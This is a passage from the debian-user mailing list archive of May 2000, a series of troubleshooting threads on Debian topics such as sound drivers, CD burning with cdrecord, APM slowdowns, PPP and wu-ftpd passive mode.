potato ready for ip-masquerade, or need to recompile kernel?

2000-05-03 Thread Stan Kaufman
Can't seem to find the answer for this simple question in the FAQs and
HOWTOs: does the standard potato install have ip-masquerade compiled
into it as it comes from the Debian site, or do I need to recompile the
kernel to to get this option?

TIA!

Stan


Re: Help, please. PCI128 sound card seen, but not heard

2000-05-03 Thread Jonathan Heaney
[EMAIL PROTECTED] wrote:

> I'm using the 2.2.14 kernel on an Asus k7V mb(Athlon), and have compiled
> into the kernel the ES1371 sound driver.  On bootup the card is detected at
> irq 10 and a memory address of 0x9000 (which does NOT happen with the
> ES1370 driver).
>
> I have added myself (as a normal user) to the audio and cdrom groups, and
> have installed several mixers to ensure the master volume (and everything
> else, in frustration) is cranked up.
>
> No sound whatsoever.  Cd plays (lights up), but nothing else.  All cables
> are set properly.  It works under Winblows98 with no alterations, and I've
> confirmed the irq/mem settings there.  Same settings on both systems for
> other cards too, with no conflicts.  I have a Voodoo 3 AGP and an SMC
> 10/100 card in other slots.
>
> I installed a modules-ready 2.2.14 kernel and the latest version of the
> ALSA drivers, compiled according to directions, reconf'd the alias file for
> modules, and again see the card being ID'd (and again, the ens1370.o module
> does Not work).  No sound.  Mixer again agressively manipulated with no
> results.  :\
>
> I haven't run across anything helpful in the list archives, and the only
> suggestion for no sound in the docs is the use of the mixer (and I used the
> alsamixer for that module).
>
> Can anyone offer some advice here??  Thanks!

Compiling the OSS driver direct into the kernel should be OK; try and get that
working before attempting the switch to ALSA.

What does

cat /dev/sndstat

give you?

If there is no /dev/sndstat, you need to create the relevant /dev entries.  Try

cd /dev
./MAKEDEV audio

Jonathan


Re: cdrecord question

2000-05-03 Thread Cory T. Echols
On 05/03, Andrew Kae wrote:
> Hello,
> 
> I have a Matsushita (Panasonic) 7582 IDE cdr.  I've read
> through the CD-Writing Howto but I am still confused about
> one thing.
> 
> Is it possible to write files and directories to a cd without making
> an image first?  

It can be done, I've never tried it, so I don't know if it's really
a good idea or not.  According to the CD-Writing howto, you can pipe
the output of mkisofs to cdrecord, like so:

shell> IMG_SIZE=`mkisofs -R -q -print-size private_collection/  2>&1 \ 
   | sed -e "s/.* = //"` 
shell> echo $IMG_SIZE shell> [ "0$IMG_SIZE" -ne 0 ] \
   && mkisofs -r private_collection/  \ 
   |cdrecord  speed=2  dev=0,6,0  
   tsize=${IMG_SIZE}s  -data -
  #Don't forget the s --^^-- read data from STDIN

  The success of this depends greatly on the speed of your machine.  You
definitely won't want to run any hard-disk intensive process while this
is going on.

  Hope this helps.

-- 
Cory T. Echols
[EMAIL PROTECTED]


Re: Problems leaving computer on overnight

2000-05-03 Thread Heather
> On Thu, 27 Apr 2000, Bryan K. Walton wrote:
> >
Bryan K Walton>>I have apm disabled in the bios.  But when I come in each 
  >>morning, my computer is CREEPING.  ...

Alex> I get this problem about every 1 in 10 (maybe 15) suspends.  From what I
> can tell CPU Idle calls are being constantly called so slowing your
> machine to a grinding halt (however giving you lots of battery life
> :) ).  I have tried lots of APM kernel compile options to try and stop
> this from happening however I haven't found out how to fix the problem
> yet.

Um, actually, you probably want to turn -off- the compile option for making
CPU idle calls when bored.  The result should eat more energy, but if you're
plugged into wall power you shouldn't care.

In the ideal world -it- wouldn't care - it would notice through the apm code
that you're "AC online" and would never bother to issue idle calls.  I don't
think it's that bright yet.  Anyone who knows how to read that glop of code
who knows better than I, please advise...

I think this maybe also responsible for some systems getting a sliding clock 
time.  If you switch over into slower CPU but the sysclock thinks a tick is
a smaller portion of realtime... another thing where reading the code might
bear a clue?

>   However I have found a "sort-of" work around (well it works on my
> laptop).  As root type "apm -s", putting your machine into suspend (or
> hibernate).  Leave for a few seconds (5ish) and then resume you
> machine.  This seems to fix the problem for me.  However sometimes do to
> the laws of probability you get this slow down occuring twice in a row :(
> just repeat those steps and hopefully the odds are on your side :)
> 
> I hope this has helped
> Alex

Anyone have experience with the 15pre20 kit from woody, and whether it helps
or has no effect in this space?

* Heather


Re: Help, please. PCI128 sound card seen, but not heard

2000-05-03 Thread kvaughan
At 01:16 PM 5/3/00 -0600, you wrote:
>[EMAIL PROTECTED] wrote:
>> 
>> I'm using the 2.2.14 kernel on an Asus k7V mb(Athlon), and have compiled
>> into the kernel the ES1371 sound driver.  On bootup the card is detected at
...

>Did you add ens1370 to /etc/modules? I know I've made that mistake
>before...

The ALSA install put every module they support into there.  I modified
/etc/modutils/alias to try both the ens1370 and ens1371 modules.  The 1370
failed to detect anything. The 1371 did, but still no sound.

Is it possible that something in the card is not being initialized properly??

Over lunch I DL'd the precompiled alsa-modules-2.2.13, along with the
kernel-image.  No go.  It seems that it picked up the es1371 module before
the ALSA one loaded.  I need to try to modify things to let the ALSA ones
work (rmmod or whatever, if the es1371 isn't compiled straight into that
image).  No sound regardless in that attempt.


Kenward


Kenward

  .'^~;,_
Dr. Kenward Vaughan   ':,^'
Professor of Chemistry\;:/
Bakersfield College   |,;|
Bakersfield, CA  93305   / ', \
/ o  O \
[EMAIL PROTECTED]   (oOoOOoOo)
 ------
  ???$$MM$$???



Re: cdrecord question

2000-05-03 Thread Johann Spies
On Wed, May 03, 2000 at 01:49:53PM -0400, Andrew Kae wrote:

> Is it possible to write files and directories to a cd without making
> an image first?  I don't have 650 MB of my hard drive to spare for
> an image file.  

No you can not write a CD without making an imagefile.  The imagefile
does not have to be 650 meg.  You can use the rewrite option (I use it
for my daily backups on a CD-RW).  If you do not have enough HD-space
I would suggest that you smaller images and write them incrementally.

Johann

-- 
J.H. Spies, Hugenotestraat 29, Posbus 80, Franschhoek, 7690, South Africa
Tel/Faks 021-876-2337 Sel/Cell 082-255-2388
 "Rejoice with them that do rejoice, and weep with them 
  that weep."Romans 12:15 


Re: viewing pdf from mutt - procmail question?

2000-05-03 Thread J.H.M. Dassen \(Ray\)
On Tue, May 02, 2000 at 16:47:38 -0400, Lee Bradshaw wrote:
> I can view pdf attachments from mutt if they have mime headers like
> 
>  Content-Type: application/pdf; name="file.pdf"
> 
> However I get quite a few emails with
> 
>  Content-Type: application/octet-stream
> 
> Does anyone have a reliable way for modifying the Content-Type and
> changing octet-stream to a useable type (pdf in this case)?

I'd approach this in a different way (besides educating people about the
proper use of MIME types of course):
create a viewer script for application/octet-stream which saves its input in
a temporary file, runs
file -b thetempfile | magic2mime
to determine the proper MIME type, and then view it using the "see" program
from mime-utils.

HTH,
Ray
-- 
Tevens ben ik van mening dat Nederland overdekt dient te worden.


Re: cdrecord question

2000-05-03 Thread Ben Collins
On Wed, May 03, 2000 at 01:49:53PM -0400, Andrew Kae wrote:
> Hello,
> 
> I have a Matsushita (Panasonic) 7582 IDE cdr.  I've read
> through the CD-Writing Howto but I am still confused about
> one thing.
> 
> Is it possible to write files and directories to a cd without making
> an image first?  I don't have 650 MB of my hard drive to spare for
> an image file.  In Windoze, Adaptec EZ-CD recorder can take in
> a list of files and then just burn them to a cd.  It seems to me the
> only way to make data cds is to make an image first and then use
> cdrecord to make the image into a cd.
> 
> Can anyone help me out?

I use this little script to write on the fly (taken from the CD-Writing
HOWTO, IIRC):


#!/bin/sh -e

if [ "$1" == "" ]; then
echo Usage: `basename $0` ""
exit 1
fi

if [ ! -d $1 ]; then
echo "$1 is not a directory"
exit 1
fi

mkisofs -r -J --quiet $1 | buffer -s 512k -m 2m | \
cdrecord speed=4 dev=/dev/sg0 -data -

exit 0
# end

Make sure you install the "buffer" and "mkisofs" packages, and also
check/change the device if needed (probably wont need to). Then run the
command like this:

(assuming you saved the above script as "onthefly" in your cwd)
chmod 755 onthefly # only need to run this the first time
./onthefly mycddir/

It will then take the contents of "mycddir/" and write that as the CD
root, without having to write an intermediate ISO image.

Ben

-- 
 ---===-=-==-=---==-=--
/  Ben Collins  --  ...on that fantastic voyage...  --  Debian GNU/Linux   \
`  [EMAIL PROTECTED]  --  [EMAIL PROTECTED]  --  [EMAIL PROTECTED]  '
 `---=--===-=-=-=-===-==---=--=---'


Re: Help, please. PCI128 sound card seen, but not heard

2000-05-03 Thread Jason Zdan
[EMAIL PROTECTED] wrote:
> 
> I'm using the 2.2.14 kernel on an Asus k7V mb(Athlon), and have compiled
> into the kernel the ES1371 sound driver.  On bootup the card is detected at
> irq 10 and a memory address of 0x9000 (which does NOT happen with the
> ES1370 driver).
> 
> I have added myself (as a normal user) to the audio and cdrom groups, and
> have installed several mixers to ensure the master volume (and everything
> else, in frustration) is cranked up.
> 
> No sound whatsoever.  Cd plays (lights up), but nothing else.  All cables
> are set properly.  It works under Winblows98 with no alterations, and I've
> confirmed the irq/mem settings there.  Same settings on both systems for
> other cards too, with no conflicts.  I have a Voodoo 3 AGP and an SMC
> 10/100 card in other slots.
> 
> I installed a modules-ready 2.2.14 kernel and the latest version of the
> ALSA drivers, compiled according to directions, reconf'd the alias file for
> modules, and again see the card being ID'd (and again, the ens1370.o module
> does Not work).  No sound.  Mixer again agressively manipulated with no
> results.  :\
> 
> I haven't run across anything helpful in the list archives, and the only
> suggestion for no sound in the docs is the use of the mixer (and I used the
> alsamixer for that module).
> 
> Can anyone offer some advice here??  Thanks!

Did you add ens1370 to /etc/modules? I know I've made that mistake
before...

HTH, J.


RE: Two modems

2000-05-03 Thread Robert Varga


Have you managed to do this? I will have to setup a machine with two
modems, but I cannot make eql to work. I don't have static ip-s. I do
everything as stated in the documentation, it does not give any error, but
neither does it work. 

Regards,

Robert Varga

On Mon, 10 Apr 2000, Tom Warfield wrote:

> Its called Multi PPP.  I am working on doing the same thing and have been
> told by several people that it can be done.  Here are dome links;
> 
> http://mp.mansol.net.au
> 
> http://www.xteamlinux.com.cn/lxr/source/Documentation/networking/eql.txt
> 
> http://linux-mp.terz.de/
> 
> There are some posting on FreshMeat.net that rate these. I guess it appears
> that there are a few ways to do it.  I will be trying to accomplish this
> within the next month so that i can use dual from my house.  If you find
> anything that is usefull please let me know.  I am a newbie and im still
> trying to decide what is the best way to accomplish this.
> 
> 
> Tom W.
> -Original Message-
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]
> Behalf Of Camilo Alejandro Arboleda
> Sent: Monday, April 10, 2000 5:42 AM
> To: debian-user@lists.debian.org
> Subject: Two modems
> 
> 
> Hi!
> 
> I have two modems and I want to increase my bandwidth.
> 
> There are some way to share Internet trafic through two ppp interfaces?
> 
> Thanks,
> Camilo Alejadro
> --
> * De simio la conoci y he visto hombres que la ańoran.
> * En lo que a mi se refiere, ni entonces ni ahora
> * perdi mi libertad.
>   Informe para una academia. Franz Kafka
> 
> 
> --
> Unsubscribe?  mail -s unsubscribe [EMAIL PROTECTED] <
> /dev/null
> 
> 
> -- 
> Unsubscribe?  mail -s unsubscribe [EMAIL PROTECTED] < /dev/null
> 
> 


what does [shellutils on hurd] mean?

2000-05-03 Thread Dan Christensen
Lately when I've been doing 'apt-get -s dist-upgrade' on my woody system
I often get dozens of things like

Inst kernel-package [shellutils on hurd]

Can someone tell me what this means?  Thanks.

Dan


Re: Coda filesystem?

2000-05-03 Thread Christoph Gaitzsch
Oki DZ <[EMAIL PROTECTED]> writes:

> On Sat, 15 Apr 2000, Norman Walsh wrote:
> 
> > I'll shortly have both a laptop and a desktop machine, just out of
> > curiosity, is anyone using the Coda filesystem on top of Debian?
> 
> Not yet, but already installed.
> 
> Oki

I use it on my laptop with my home machine as Coda-Server, and I like
it very much. I keep my diary and address-files there, and some other
stuff I want to share. If it keeps beeing stable, I will put more
stuff in the shared directories.

Greetings, Christoph


Re: ppp error

2000-05-03 Thread Graeme Mathieson
Hi,

Kreaped Ripping Reaper <[EMAIL PROTECTED]> writes:

> May  3 22:31:54 kreaper pppd[770]: Unsupported protocol 'Appletalk
> Control Protocol' (0x8029) received

My guess would be that during LCP negotiation, the remote end is offering
Appletalk piped of PPP.  Why you'd want Appletalk piped over PPP is anybody's
guess, but there you go.

Just ignore it.

-- 
Graeme.
[EMAIL PROTECTED]

"Life's not fair," I reply. "But the root password helps." - BOFH


WU-FTPD and passive ftp

2000-05-03 Thread Richard A Nelson
Has anyone run wu-ftpd Version wu-2.6.0(1) Wed Mar 15 16:30:52 CET 2000
with passive ftp support?

ftp> ls wtf 
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
-rw-r--r--1 cowboy   cowboy   9269 Nov 18 17:15 wtf
226 Transfer complete.
ftp> passive
Passive mode on.
ftp> ls wtf
227 Entering Passive Mode (9,51,81,11,180,209)
421 Service not available, remote server has closed connection

I get no indications of anything wrong in the syslog...

I know its trying passive, because if I use a host that isn't in
pasv-allow, I get this:
ftp> passive
Passive mode on.
ftp> ls wtf
227 Entering Passive Mode (9,51,81,11,99,62)
ftp: connect: Connection refused

The relevant portions of ftpaccess are:
passive address 9.51.81.11 0.0.0.0/0# this *IS* required for passive
passive ports 0.0.0.0/0 1024 65535  # to see if it made a difference
pasv-allow all *.ibm.com# localhost fails this test
port-allow all *.ibm.com# Is this needed wrt passive?
-- 
Rick Nelson
Life'll kill ya -- Warren Zevon 
Then you'll be dead -- Life'll kill ya


cdrecord question

2000-05-03 Thread Andrew Kae
Hello,

I have a Matsushita (Panasonic) 7582 IDE cdr.  I've read
through the CD-Writing Howto but I am still confused about
one thing.

Is it possible to write files and directories to a cd without making
an image first?  I don't have 650 MB of my hard drive to spare for
an image file.  In Windoze, Adaptec EZ-CD recorder can take in
a list of files and then just burn them to a cd.  It seems to me the
only way to make data cds is to make an image first and then use
cdrecord to make the image into a cd.

Can anyone help me out?

thanks


Re: Passing an input file through mail.

2000-05-03 Thread Jason Zdan
> define('confDOMAIN_NAME',`$w.dingoblue.net.au')dnl
> define('SMART_HOST',`mail.dingoblue.net.au')dnl
> FEATURE(always_add_domain)dnl
> 

I admit I don't know much about sendmail, but it seems to me that the
$w.dingoblue.net.au would add the "pancreas" to the front of your domain
name. Maybe try dingoblue.net.au instead?

My apologies if I'm dead wrong :)

J.


Re: usb floppy drive/anything

2000-05-03 Thread pplaw


pplaw wrote:

> debs,
>
> i just got a sony picturebook (pcg-c1xs) yesterday.
>
> i did a smooth, harddrive  install. (thanks project!)
>
> having a usb floppy drive, i want to make a boot floppy, but the
> box doesn't recognize /dev/fd0.
>
> eg. "$  mount /dev/fd0 /bt "
>
>   " mount:  the kernel does not recognize /dev/fd0 as a block
> device."
>
> i'm a virgin at the recompile.  but am i looking at that for usb
> support?  installing potato? ...woody?
>
> ia, t.
>
> bentley taylor.
>
> //

p.s.  i forgot to mention that i floppy boot the system with no prob
(except it just takes about 5 minutes--because i'm using a "generic"
boot disk).

b.

//


--




>> Bentley Taylor <<
   __
  [EMAIL PROTECTED]



/etc/ioctl.save?

2000-05-03 Thread Marc Haber
Hi!

I'd like to know what /etc/ioctl.save is and to which package it
belongs. That file gets touched on every system boot and therefore
needs special attention with the IDS. Any hints how to stop that
behavior or what package to file a bug against?

Greetings
Marc

-- 
-- !! No courtesy copies, please !! -
Marc Haber  |   " Questions are the | Mailadresse im Header
Karlsruhe, Germany  | Beginning of Wisdom " | Fon: *49 721 966 32 15
Nordisch by Nature  | Lt. Worf, TNG "Rightful Heir" | Fax: *49 721 966 31 29


Help, please. PCI128 sound card seen, but not heard

2000-05-03 Thread kvaughan
I'm using the 2.2.14 kernel on an Asus k7V mb(Athlon), and have compiled
into the kernel the ES1371 sound driver.  On bootup the card is detected at
irq 10 and a memory address of 0x9000 (which does NOT happen with the
ES1370 driver).

I have added myself (as a normal user) to the audio and cdrom groups, and
have installed several mixers to ensure the master volume (and everything
else, in frustration) is cranked up.

No sound whatsoever.  Cd plays (lights up), but nothing else.  All cables
are set properly.  It works under Winblows98 with no alterations, and I've
confirmed the irq/mem settings there.  Same settings on both systems for
other cards too, with no conflicts.  I have a Voodoo 3 AGP and an SMC
10/100 card in other slots.

I installed a modules-ready 2.2.14 kernel and the latest version of the
ALSA drivers, compiled according to directions, reconf'd the alias file for
modules, and again see the card being ID'd (and again, the ens1370.o module
does Not work).  No sound.  Mixer again agressively manipulated with no
results.  :\

I haven't run across anything helpful in the list archives, and the only
suggestion for no sound in the docs is the use of the mixer (and I used the
alsamixer for that module).

Can anyone offer some advice here??  Thanks!

Kenward
(at work, under NT :(  )


  .'^~;,_
Dr. Kenward Vaughan   ':,^'
Professor of Chemistry\;:/
Bakersfield College   |,;|
Bakersfield, CA  93305   / ', \
/ o  O \
[EMAIL PROTECTED]   (oOoOOoOo)
 ------
  ???$$MM$$???



How to install via local ftp?

2000-05-03 Thread Hans
I have a PC (called knock) without CD-ROM drive. I set up a base system
from floppy, set up networking, can ping and manually ftp without problem
with the rest of my network. Now I like to mount a Debian CD on my server
(knick) and install software on knock via ftp with apt-get. I set up the
source, but apt complains it can't ftp anonymous, so it can't get the
source package list. How to I go about this? I don't have NFS experience,
so I'd prefer ftp. My network is only local, no internet, so security is
not a problem. Anyone? --hans

P.S. in case you're wondering, my third PC is called knack :-)


Re: Mail/news software

2000-05-03 Thread pplaw


Richard Lyon wrote:

> > -Original Message-
> > From: Steve Lamb [mailto:[EMAIL PROTECTED]
> > Sent: Sunday, 30 April 2000 10:11 PM
> > To: Kovacs Istvan
> > Cc: Debian User List
> > Subject: Re: Mail/news software
> >
>
>
> >I don't like the Netscape browser on either Win98 or Linux. It's clunky
> >and seems to crash with a greater regularity than Internet Explorer.
>

//

i don't know what "clunky" means in terms of browser standards, but netscape 
4.7 (from
http://www.netscape.net) hasn't crashed in any of my laptops nor my desktop, all
running dlinux..  i highly recommend it.

...totally unbiased,

bentley taylor.

//


>
> --
> Unsubscribe?  mail -s unsubscribe [EMAIL PROTECTED] < /dev/null

--




>> Bentley Taylor <<
   __
  [EMAIL PROTECTED]



Re: usb floppy drive/anything

2000-05-03 Thread Gary Hennigan
pplaw <[EMAIL PROTECTED]> writes:
> debs,
> 
> i just got a sony picturebook (pcg-c1xs) yesterday.
> 
> i did a smooth, harddrive  install. (thanks project!)
> 
> having a usb floppy drive, i want to make a boot floppy, but the
> box doesn't recognize /dev/fd0.
> 
> eg. "$  mount /dev/fd0 /bt "
> 
>   " mount:  the kernel does not recognize /dev/fd0 as a block
> device."
> 
> i'm a virgin at the recompile.  but am i looking at that for usb
> support?  installing potato? ...woody?
> 
> ia, t.

I may be mistaken but I don't think either potato or woody, alone,
will solve your problem. The difficulty is that USB support is still
VERY much in it's early stages and almost all the current development
has focused on the 2.3.x series of development kernels. I don't think
either of these are available in woody or potato.

What you can do is install one of the kernel-source-2.2.x packages
then go to the Linux USB home page (http://www.linux-usb.org) and get
the Backport of the 2.3 USB code for 2.2 kernels. I assume it's a
patch that you apply to the kernel-source directory.

Before that you'll want to see if your device is listed as being
supported in the list available via the aforementioned Linux USB web
page.

Good Luck,
Gary


Re: aha1520 scsi card

2000-05-03 Thread Stan Kaufman
Paul wrote:
> 
> I have picked up an Adaptec aha1520 and installed it into my computer.
> I build a new kernel with module support for aha152x and did all the isapnp
> stuff to probe the card...
> 
> With isapnp I set the card to io: 0x340   irq: 11
> 
> But when modprob aha152x with the required parameters it fails to insert the
> module.
> 
> So I tried building the support into the kernel, this did not work either.
> 
> Can someone help me get this going or tell me where I can find information on
> getting this particular card working in linux?
> 
> Thanks
> Paul

Paul, I don't know about your particular card, but I know from bitter
recent experience that the isapnp (isapnptools) approach doesn't
necessarily work with some devices. I was trying to configure some NICs,
but they silently failed giving bizarre results. I finally booted the
box to DOS and configured the NICs with a DOS utility I got from Intel.
I suggest you consider the same approach. I think what you'd need for
your scsi card is at
http://www.adaptec.com/support/overview/aha1520.html. Disclaimer: the
issues for scsi cards may be different than NICs; this is outside my
small envelope of knowledge ;-)

Stan


alt-gr key not working in woody

2000-05-03 Thread Rolf Schillinger
Hi,
I recently did a dist-upgrade potato->woody.
Since then I am not able to use my alt-gr(right alt) key anymore.
I checked with xkeycaps read docs and all.
My alt-gr now produces:
state 0x0, keycode 113 (keysym 0xff7e, Mode_switch),
but on my german keyboard I cannot get any of @| and so on.
I had to switch to U.S.
Anyone knows of a cure?
tia, Rolf


Re: file transfers to Win2K

2000-05-03 Thread Jens B. Jorgensen
Additionally you could use smbclient. This allows batch transfers as well and 
you
wouldn't have to run an FTP server on the target machine.

[EMAIL PROTECTED] wrote:

> Hiya
>
> what would be the best way to routinely (ie. daily) transfer 500MB worth of
> image files from a linux system to a Windows 2000 or NT?
>
> would ftp be the best choice or is it prone to bad behaviour if
> unsupervised?
>
> Zane
>
> --
> Unsubscribe?  mail -s unsubscribe [EMAIL PROTECTED] < /dev/null

--
Jens B. Jorgensen
[EMAIL PROTECTED]



usb floppy drive/anything

2000-05-03 Thread pplaw
debs,

i just got a sony picturebook (pcg-c1xs) yesterday.

i did a smooth, harddrive  install. (thanks project!)

having a usb floppy drive, i want to make a boot floppy, but the
box doesn't recognize /dev/fd0.

eg. "$  mount /dev/fd0 /bt "

  " mount:  the kernel does not recognize /dev/fd0 as a block
device."

i'm a virgin at the recompile.  but am i looking at that for usb
support?  installing potato? ...woody?

ia, t.

bentley taylor.

//


Re[2]: Emacs - was Re: Mail/news software

2000-05-03 Thread Steve Lamb
Tuesday, May 02, 2000, 9:10:53 PM, Pat wrote:
> important and I don't see Windows 9x or NT giving this, although I have zero
> experience with NT. But I do know that to kill a runaway process in Win95
> you have to Ctrl-Alt-Delete, wait for the little window to pop up (forgot
> what it's called), and click on it and tell Windows to close the program.
> Typing 'kill' seems so much simpler. The point, I guess, is the same as
> yours: both CLI and GUI have pros and cons. I like my linux box where both
> are often available. (you say that further down too.)

Not to mention that the little window only shows registered processes, not
all processes.  It requires explorer to be running to be able to work and
often times it is a component of explorer that is hanging.  It also hopes that
the queue is not jammed, which often it is.  So a lot of times you get a blue
screen saying the system is busy, hit return to wait or CAD to reboot.

I dunno, but a kill off my WYSE terminal on the serial port seems a lot
easier because it has a lot /less/ on it to go wrong, actually works and lets
me kill all processes, not just registered ones.

For me it isn't a GUI/CLI mindset it is simply the ability to do what
needs to be done.  Windows doesn't let me do that in most cases.  The standard
'nix utilities provide a lot of automation for mundane tasks.

-- 
 Steve C. Lamb | I'm your priest, I'm your shrink, I'm your
 ICQ: 5107343  | main connection to the switchboard of souls.
---+-



Re: Problems leaving computer on overnight

2000-05-03 Thread Alexander Clouter
On Thu, 27 Apr 2000, Bryan K. Walton wrote:
>
>   OK, now on to my present problem:
> I have a Thinkpad 390E (266mhz and 128 meg of Ram) running Debian frozen
> at my place of work.  Historically, I have shutdown my laptop every night
> and then rebooted every morning.  But, as I understand that Linux doesn't
> need to be rebooted all of the time, I thought I would start to leave it
> running, but it presents me with some problems.
>   I have apm disabled in the bios.  But when I come in each morning,
> my computer is CREEPING.  From the wdm login screen, it takes about 5
> minutes to load Gnome.  But even if it loads, it then takes another minute
> to open any program such as Netscape.  When I run top, nothing shows up
> odd.  The only way I have found to fix this problem is to reboot.
>   Is there a program out there that I need to install to fix
> this?  Is this a bug in frozen?  How can I, or should I give my computer a
> "jolt" of energy?
> 
I get this problem about every 1 in 10 (maybe 15) suspends.  From what I
can tell CPU Idle calls are being constantly called so slowing your
machine to a grinding halt (however giving you lots of battery life
:) ).  I have tried lots of APM kernel compile options to try and stop
this from happening however I haven't found out how to fix the problem
yet.
However I have found a "sort-of" work around (well it works on my
laptop).  As root type "apm -s", putting your machine into suspend (or
hibernate).  Leave for a few seconds (5ish) and then resume you
machine.  This seems to fix the problem for me.  However sometimes do to
the laws of probability you get this slow down occuring twice in a row :(
just repeat those steps and hopefully the odds are on your side :)

I hope this has helped

Alex

-- 
**   ((__))   Alexander "Jim diGriz" Clouter
 \\  ((oo))
  \\--\\// e-mail: [EMAIL PROTECTED]
   ||  || 
   ||||||   
   ~~~~~~  equip : 300Mhz Celeron Laptop running
  Cow during an Debian Potato Linux
   Earthquake  


ppp error

2000-05-03 Thread Kreaped Ripping Reaper
i got an error on my PPP when i dial to my ISP. The connection just go
fine but this error msg still bugs me..

May  3 22:31:49 kreaper pppd[770]: Serial connection established.
May  3 22:31:49 kreaper pppd[770]: Using interface ppp0
May  3 22:31:49 kreaper pppd[770]: Connect: ppp0 <--> /dev/ttyS1
May  3 22:31:54 kreaper pppd[770]: Unsupported protocol 'Appletalk
Control Protocol' (0x8029) received
May  3 22:31:57 kreaper pppd[770]: local  IP address x.x.x.x
May  3 22:31:57 kreaper pppd[770]: remote IP address x.x.x.x


i also had loaded the appletalk.o module but still that error is there.
anyone can figure out?


cactvs

2000-05-03 Thread Hans Gubitz
Is there anybody who has installed cactvs on Debian/potato ?
(cactvstools-Linux2.2-3.37.tar.gz) 

csed comes up with : Segmentation fault.

Gruß Hans Gubitz
-- 
Hans Gubitz <[EMAIL PROTECTED]>


Re: Passing an input file through mail.

2000-05-03 Thread Corey Popelier
Thanks for the reply Eric, at the least it made me realise that using a
pipe I didn't need to dump the file first and thus make it a two line job.

I still get the same problem, however, and I can safely say it's because
I've screwed up sendmail somehow. "Mail" tries to send as:
[EMAIL PROTECTED], which is obviously wrong, as I'm just
[EMAIL PROTECTED], and my sendmail logs tell me:

My unqualified host name (Pancreas) unknown...

However mail still works properly from Pine (as I use here, and in
Netscape, etc, which uses something different for mail transport anyway
IIRC).

as a sample, my sendmail.mc contains:

define('confDOMAIN_NAME',`$w.dingoblue.net.au')dnl
define('SMART_HOST',`mail.dingoblue.net.au')dnl
FEATURE(always_add_domain)dnl

Is any of this incorrect, or should I be looking elsewhere?

Cheers,
 Corey Popelier
 http://members.dingoblue.net.au/~pancreas
 Work Email: [EMAIL PROTECTED]



Re: apt-get interrupted download

2000-05-03 Thread Corey Popelier
Only thing I can think of is the package itself has changed in between the
time you started and resumed the download. If this is not the case, I have
no idea why it didn't resume.

Cheers,
 Corey Popelier
 http://members.dingoblue.net.au/~pancreas
 Work Email: [EMAIL PROTECTED]

On Wed, 3 May 2000, Johann Spies wrote:

> I have a dialup ISP-connection.  Using apt-get source
> kernel-source-2.2.14 to download the kernel source was interrupted
> after more than 8 meg.  When I started it again just now, apt-get
> started again from byte 0.  Why?  In the past it would just resume
> from where the download was interrupted.
> 
> Johann
> -- 
> J.H. Spies, Hugenotestraat 29, Posbus 80, Franschhoek, 7690, South Africa
> Tel/Faks 021-876-2337 Sel/Cell 082-255-2388
>  "Rejoice with them that do rejoice, and weep with them 
>   that weep."Romans 12:15 
> 
> 
> -- 
> Unsubscribe?  mail -s unsubscribe [EMAIL PROTECTED] < /dev/null
> 


Re: grip and cdparanoia, must run suid?

2000-05-03 Thread Lee Bradshaw
On Wed, May 03, 2000 at 05:37:42AM -0700, Kenneth Scharf wrote:
> I installed grip, but I can't run in unless I am root
> (sudo, or suid).  The error I get is 'can't access cd
> rom drive'.  My /dev/scd1 is owned by root, group is
> cdrom.  The drive is actually on /dev/hdc physically
> but I am running scsi-ide emulation.  I also have a
> 'real' scsi cdrom that is /dev/scd0.  I added myself
> to the cdrom group (edited /etc/group as root) and
> logged out and back in as myself.  No joy, still can't
> run grip or cdparanoia (actually it was cdparanoia
> that issued the error message).  I did chmod +s on
> cdparanoia and grip and then it worked.  But I should
> be able to access the cdrom if I'm in the cdrom group?
>  I can access my /dev/dsp device by adding myself to
> the audio group (I don't think xmmm is suid, I can run
> it as a user in the audio group).
> Ideas?

If it's anything like "real" scsi devices, then the scsi generic
devices must be writeable. Unfortunately these device id's can change
if you add or remove scsi devices. I wrote a script to correct the
permissions at system startup, but I must not be using it since I
can't find the script.

Anyway, notice that sg2 and sg3 are writeable by group cdrom. Only
one of the devices is really writeable, but the script changes all sg
devices back to crw--- root:root and then all cdroms (writeable or
not) to crw-rw root:cdrom.

freefall ~/technical $ ll /dev/sg*
crw---1 root root  21,   0 Aug 18  1999 /dev/sg0
crw---1 root root  21,   1 Aug 18  1999 /dev/sg1
crw---1 root root  21,  10 Aug 18  1999 /dev/sg10
crw---1 root root  21,  11 Aug 18  1999 /dev/sg11
crw---1 root root  21,  12 Aug 18  1999 /dev/sg12
crw---1 root root  21,  13 Aug 18  1999 /dev/sg13
crw---1 root root  21,  14 Aug 18  1999 /dev/sg14
crw---1 root root  21,  15 Aug 18  1999 /dev/sg15
crw---1 root root  21,  16 Aug 18  1999 /dev/sg16
crw-rw1 root cdrom 21,   2 Aug 18  1999 /dev/sg2
crw-rw1 root cdrom 21,   3 Aug 18  1999 /dev/sg3
crw---1 root root  21,   4 Aug 18  1999 /dev/sg4
crw---1 root root  21,   5 Aug 18  1999 /dev/sg5
crw---1 root root  21,   6 Aug 18  1999 /dev/sg6
crw---1 root root  21,   7 Aug 18  1999 /dev/sg7
crw---1 root root  21,   8 Aug 18  1999 /dev/sg8
crw---1 root root  21,   9 Aug 18  1999 /dev/sg9

I think cdparanoia had some docs on how to determine the scsi generic
device number to go along with a particular device, but I don't know how
ide emulation affects it.

-- 
Lee Bradshaw [EMAIL PROTECTED] (preferred)
Alantro Communications   [EMAIL PROTECTED]


solved: smartlist headers

2000-05-03 Thread Dan Brosemer
On Wed, May 03, 2000 at 01:11:42PM +0200, Santiago Vila Doncel wrote:
> On Tue, 2 May 2000, Dan Brosemer wrote:
> Yes, please read /usr/doc/smartlist/README.exim.

Thanks very much.  Worked like a charm.  I didn't realize it was exim that
was adding the pesky headers.

-Dan

-- 
"Beware he who would deny you access to information, for in his heart 
he dreams himself your master."


pgptSw439oslk.pgp
Description: PGP signature


Re: PPP over null modem

2000-05-03 Thread Dan Brosemer
On Wed, May 03, 2000 at 02:21:32PM +0700, Oki DZ wrote:
> On Tue, 2 May 2000, Dan Brosemer wrote:
> > I'm trying to install potato over a PPP connection between a laptop with no
> > network card (hermod) and a desktop with ethernet (bolverk).
> > 
> > I can communicate over the null modem between machines with minicom no
> > problem.
> > 
> > hermod:~# pppd -detach /dev/ttyS0 57600 192.168.5.2:192.168.5.1 crtscts
> > debug noauth
> > bolverk:~# pppd -detach /dev/ttyS1 57600 192.168.5.1:192.168.5.2 crtscts 
> > debug noauth
